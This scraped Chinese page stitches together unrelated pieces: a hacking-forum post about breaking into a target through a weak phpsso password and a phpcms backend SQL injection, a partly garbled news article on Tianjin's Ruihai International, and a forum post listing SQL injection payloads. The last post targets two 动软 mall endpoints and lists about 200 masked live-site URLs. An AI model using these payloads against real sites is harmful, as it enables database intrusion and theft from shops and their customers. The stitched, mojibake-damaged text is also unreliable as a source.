来源:蜘蛛抓取(WebSpider)
时间:2016-06-02 04:45
标签:
3ds fbi注入失败
phpcms某处比较鸡肋的sql注入 _黑客技术学习论坛 -
phpcms某处比较鸡肋的sql注入
学习中请遵循国家相关法律法规,黑客不作恶。没有网络安全就没有国家安全
未满18岁请点击上方分享按钮,分享帖子观看
如题,后台注入确实是非常鸡肋的,尤其phpcms对所有参数都进行了addslashes转义,即使gpc关闭貌似也不能通过注入拿shell。
这几天在渗透的时候遇到了一个环境发现可以利用这样鸡肋的漏洞,发现目标的架构是phpsso+dz+uc,首先是只有phpsso没有phpcms后台,功能主要是利用phpsso跟uc来通信管理用户。RP的是phpsso为弱口令!!!拿到phpsso当然想进一步获取权限~
看代码没有发现phpsso getshell漏洞,但是发现存在后台SQL注入。然后想进DZ和UC就简单多了,然后各位黑阔懂的…
详细说明:
Phpcms/Modules/member/member.php
漏洞证明:
修复方案:
发帖时间: 11:47:00 & | &
查看数:0 & | &
Powered by
技术是理财的动力!技术是每个人的实力,魅力,权利!明天王思聪就是你的小弟!学习中请遵循国家相关法律法规,黑客不作恶,黑客维护网络安全
13:00, 耗时:0.4674s瑞海国际董事长李亮起底:在天津拥两家危化品经营企业
作者:彭斐
◎每经记者 彭斐
据新华社报道,8月12日23时30分许,天津滨海新区发生危险品仓库爆炸事故。截至13日18时,已造成50人死亡,住院治疗701人。
这起造成重大人员伤亡和财产损失的事故,是谁“引发”的?无疑值得关注。
天津市警方通报称,所涉企业为滨海新区(,)7号卡子门瑞海国际物流公司。该公司危险品仓库集装箱堆场,装有危险品的集装箱起火爆炸。
瑞海国际物流公司全名为“天津东疆保税港区瑞海国际物流有限公司”(以下简称“瑞海国际”),是天津口岸危险品货物集装箱业务的大型中转、集散中心。上述资料曾出现在该公司的官网上,但网址8月12日晚就打不开了。
据新华网报道,相关企业负责人已被控制。《每日经济新闻(,)》记者获取的工商资料显示,瑞海国际的董事长李亮,同时投资天津市山川国际贸易有限公司(以下简称“山川贸易”),并为该公司执行董事。
网上的招聘资料显示,瑞海国际的关联公司山川贸易,也拥有多类危险品经营资质。
起底1 年营业收入超3000万元
“公司以经营危险化学品集装箱拆箱、装箱、中转运输、货物申报、运抵配送及仓储服务等业务为主,年货运吞吐量100万吨,年营业收入达3000万元以上。”这些介绍仍然可以从百度快照里获取。
这一简介还称,公司是天津口岸危险品货物集装箱业务的大型中转、集散中心,是天津海事局指定危险货物监装场站和天津交委港口危险货物作业许可单位。
据央广报道,中国之声记者13日在现场遇到一位瑞海公司装卸工人,他告诉记者,爆炸前,他出门替六个工友买夜宵,躲过一劫。他坦言,此前没有经过危化品培训。
然而,记者查阅天津市海事局网站,却仍然发现不少有关“瑞海国际物流公司”的正面信息。
天津市海事局网站的相关信息显示,天津东疆海事局曾于2014年9月完成对包括瑞海国际在内的3家危险货物集装箱装箱场站开展专项检查和评估。
值得注意的是,上述检查评估并未透露瑞海国际的检查结果。不过,在2014年1月的相关专项质量检查活动中,瑞海国际曾名列前茅。
起底2 集装箱装箱质量曾排第二
天津海事局在2014年1月发布的天津海事局危险货物集装箱装箱质量专项检查活动结果,提及辖区内所有五家危险货物装箱场站的装箱质量差距较大。《每日经济新闻》记者注意到,在装箱质量前三名中,瑞海国际共装箱4325箱,违章箱5箱占其装箱总量的千分之一点二,成绩位列第二。此外,去年3月5日,北疆海事局联合辖区公安、消防部门在瑞海国际举办了剧毒危险化学品泄漏事故应急演练,演练以“6.1类剧毒液体危险化学品在装箱过程中发生泄漏事故”为背景。
而据中国水运网今年3月10日相关消息,瑞海国际还曾送锦旗到北疆海事局,感谢该局长期以来为企业发展给予的帮助和支持。2014年,北疆辖区危险货物集装箱吞吐量约占天津港的70.8%,共管理着五个危险货物集装箱装箱场站。
值得注意的是,一位天津方面的知情人士透露,瑞海国际的工商注册地虽在东疆保税港区,但其经营、纳税并不在东疆方面。
8月13日,针对此次爆炸事故发生的原因,《每日经济新闻》记者多次拨打瑞海国际办公室、安保部电话试图了解,但截至发稿时,均未能接通。
起底3 公司成立3年注册资本1亿
在瑞海国际的周边,分布着十多家大小物流公司,包括讯通储运发展天津公司、精英物流有限公司、胜狮物流、金狮五矿物流等,其业务类型都以物流仓储为主。
对此,国内一家港口管理层人士向《每日经济新闻》记者表示,港口作为一个大的生态链,会有很多中小型物流企业依附,它们也是生态链的一部分。
《每日经济新闻》记者注意到,瑞海国际工商注册资料显示,瑞海国际的经营范围包括:在港区内从事装卸、仓储业务经营[以中华人民共和国港口经营许可证(津)港经证(ZC-543-03)号为准];装卸搬运;分拨、包装、简单加工;国际货运代理(海、陆、空运);集装箱储存、中转、拆箱;劳务服务;五金交电、日用百货、船舶配件、环保设备、橡胶制品、电子产品、机电设备、钢材、铁矿石、焦炭、照明设备的批发兼零售;货物及技术的进出口业务;商务信息咨询。
此外,工商注册资料还显示,该公司成立于日,注册资本1亿元。上述资料由天津市自由贸易试验区市场和质量监督管理局于今年6月29日核准。值得注意的是,瑞海国际的投资人包括舒铮、李亮两位自然人股东,在股东其他投资一项,投资人为李亮,而目标公司则为山川贸易。
起底4 同时任山川贸易执行董事
浩格云信企业服务信息显示,李亮与山川贸易、瑞海国际的关系,均为一度关联自然人。李亮除为瑞海国际的董事长外,同时为山川贸易的执行董事。只峰为瑞海国际的经理、董事、法定代表人。
和李亮情况基本类似,浩格云信企业数据服务信息还显示,瑞海国际的监事陈雅纾苍诠亓旧酱骋字腥沃凹嗍隆
而据《证券时报》报道,陈雅缯飧雒郑钩鱿衷谥谢旖虮鹾N锪饔邢薰玖等酥小V谢旖虮鹾N锪饔邢薰荆抵谢旖蛴邢薰镜娜首庸荆笳咴蛳(,)控股股东股份全资子公司。一位知情人士向《每日经济新闻》记者透露,陈雅缰霸谥谢旖虮鹾N锪饔邢薰救沃埃壳耙丫肟
山川贸易在数字英才网的招聘信息显示,公司拥有3、4、5、6、8类危险品经营资质。公司在天津市区及天津港港区内拥有自己的货代公司、报关行、车队及危险品堆场。
危险货物的危险性按照GB6944分为9类。山川贸易所拥有资质涉及:易燃液体(3类),易燃固体、易于自燃的物质、遇水放出易燃气体的物质(4类),氧化性物质和有机过氧化物(5类),毒性物质和感染性物质(6类),腐蚀性物质(8类)。
起底5 招聘信息称业内成绩显著
此外,在山川贸易上述招聘信息的介绍中还提及:天津山川物流、瑞海国际及天津锦绣大地报关行均在各自行业内成绩显著,为该公司的国内及国际业务做全方位的配套服务以满足客户需求。
山川贸易的另一个投资人叫柳桂英,网上留存的一个天津市山川物流有限公司的企业信用档案(信用代码:)显示,柳桂英为该公司的法人代表,注册资金500万元。公司位于东疆保税港区洛阳道601号,主营产品为国内、国际货运代理(海、陆、空运);货物的包装、仓储(危化品除外、港区内除外)。但记者欲进一步从天津市市场主体信用信息公示系统里查询进一步信息时,却被知知因滨海新区危险品仓库存爆炸事故影响,该网址暂停服务。因此也无法获知两位柳桂英是否同一人。《每日经济新闻》记者查询获悉,山川贸易的法定代表人为杨默。8月13日下午,记者多次联系杨默及山川贸易,尝试对网站中信息进行核实,但电话均无人接听。
“瑞海国际”是个什么公司
瑞海国际物流公司全名为“天津东疆保税港区瑞海国际物流有限公司”,是天津口岸危险品货物集装箱业务的大型中转、集散中心。工商注册资料显示,公司成立于日,注册资本1亿元。经营范围包括:在港区内从事装卸、仓储业务经营;集装箱储存、中转、拆箱等。
李亮是怎样的一个人
工商资料显示,瑞海国际董事长为李亮,瑞海国际的投资人包括舒铮、李亮两位自然人股东,在股东其他投资一项,投资人为李亮,而目标公司则为山川贸易。资料显示山川贸易也拥有多类危险品经营资质。
(责任编辑:HN055)
08/14 07:5808/14 03:40
新闻精品推荐
每日要闻推荐
社区精华推荐
精彩焦点图鉴
【免责声明】本文仅代表作者本人观点,与和讯网无关。和讯网站对文中陈述、观点判断保持中立,不对所包含内容的准确性、可靠性或完整性提供任何明示或暗示的保证。请读者仅作参考,并请自行承担全部责任。动软商城系统2枚SQL注入/影响大量商城站点(100+案例) _黑客技术学习论坛 -
动软商城系统2枚SQL注入/影响大量商城站点(100+案例)
学习中请遵循国家相关法律法规,黑客不作恶。没有网络安全就没有国家安全
未满18岁请点击上方分享按钮,分享帖子观看
挺有名的商城系统
详细说明:
其实写那么多案例就想上个首页,嘻嘻~
想必都知道这个商城系统挺有名也挺多人用的。案例我就不可能一一列出来了~
code 区域/NodeProdCategory.aspx?action=GetChildNode&CategoryId=1
看看官方demo吧:
//NodeProdCategory.aspx?action=GetChildNode&CategoryId=2%27
明明显显的mssql注入,也有极小部分是mysql数据库的注入
爆数据库版本:
//NodeProdCategory.aspx?action=GetChildNode&CategoryId=2%20and%20@@version&0--
看看user吧,想怎么注就怎么注入:
//NodeProdCategory.aspx?action=GetChildNode&CategoryId=2%20and%20user&0--
捕获一个mysql注入的:
/NodeProdCategory.aspx?action=GetChildNode&CategoryId=1'
121个案例献上证明:
mask 区域1.http://**.**.**//NodeProdCategory.aspxaction=GetChildNode&CategoryId=2%20and%20@@version&0--
2.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
3.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
4.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
5.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
6.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
7.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
8.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
9.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
10.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
11.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
12.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
13.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
14.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
15.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
16.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
17.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
18.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version&0--_
19.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1&
20.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version&0--_
21.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=2%20and%20@@version&0--_
22.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=2%20and%20@@version&0--_
23.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
24.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
**********
25.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
26.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
27.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
28.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
29.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
30.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
31.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
32.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
33.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
34.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
35.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
36.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
37.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
38.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
39.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
40.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
41.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
42.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
43.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
44.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
45.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
46.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
47.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
48.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
49.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
50.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
51.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
52.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
53.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
54.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
55.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
56.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
57.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
58.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
59.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
60.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
61.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
62.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
63.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
64.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
65.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
66.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
67.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
68.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
69.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
70.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
71.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
72.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
73.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
74.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
75.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
76.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
77.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
78.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
79.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
80.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
81.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
82.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
83.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
84.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
85.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
86.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
87.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
88.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
89.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
90.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
91.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
92.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
93.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
94.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
95.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
96.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
97.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
98.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
99.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
100.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
101.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
102.http://**.**.**//NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
103.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
104.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
105.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
106.http://**.**.**//NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
107.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
108.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
109.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
110.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
111.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
112.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
113.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
114.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
115.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
116.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
117.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
118.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
119.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
120.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
121.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
122.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--
注入点二:
code 区域/EditPhotoHandle.aspx?Action=EditCover&PhotoId=1
测试案例:
mask 区域1.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version&0--_
2.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version&0--_
3.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version&0--_
4.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version&0--_
5.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version&0--_
6.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version&0--_
7.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version&0--_
8.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version&0--_
9.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version&0--_
10.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version&0--_
11.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version&0--_
12.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version&0--_
13.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version&0--_
14.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version&0--_
15.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version&0--_
16.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version&0--_
17.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version&0--_
18.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1&
19.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version&0--_
20.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=2%20and%20@@version&0--_
21.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=2%20and%20@@version&0--_
22.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version&0--_
23.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version&0--_
24.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version&0--_
25.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version&0--_
26.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version&0--_
27.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version&0--_
28.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version&0--_
29.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version&0--_
30.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version&0--_
31.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version&0--_
32.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version&0--_
33.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version&0--_
34.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version&0--_
35.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version&0--_
36.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version&0--_
37.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version&0--_
38.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version&0--_
39.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version&0--_
40.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version&0--_
41.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version&0--_
42.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version&0--_
43.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version&0--_
44.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version&0--_
45.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version&0--_
46.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version&0--_
47.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version&0--_
48.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version&0--_
49.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version&0--_
50.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version&0--_
51.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version&0--_
52.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version&0--_
53.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version&0--_
54.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version&0--_
55.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version&0--_
56.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version&0--_
57.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version&0--_
58.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version&0--_
59.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version&0--_
60.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version&0--_
61.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version&0--_
62.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version&0--_
63.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version&0--_
64.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version&0--_
65.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version&0--_
66.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version&0--_
67.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version&0--_
68.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version&0--_
69.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version&0--_
70.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version&0--_
71.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version&0--_
72.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version&0--_
73.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version&0--_
74.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version&0--_
75.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version&0--_
76.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version&0--_
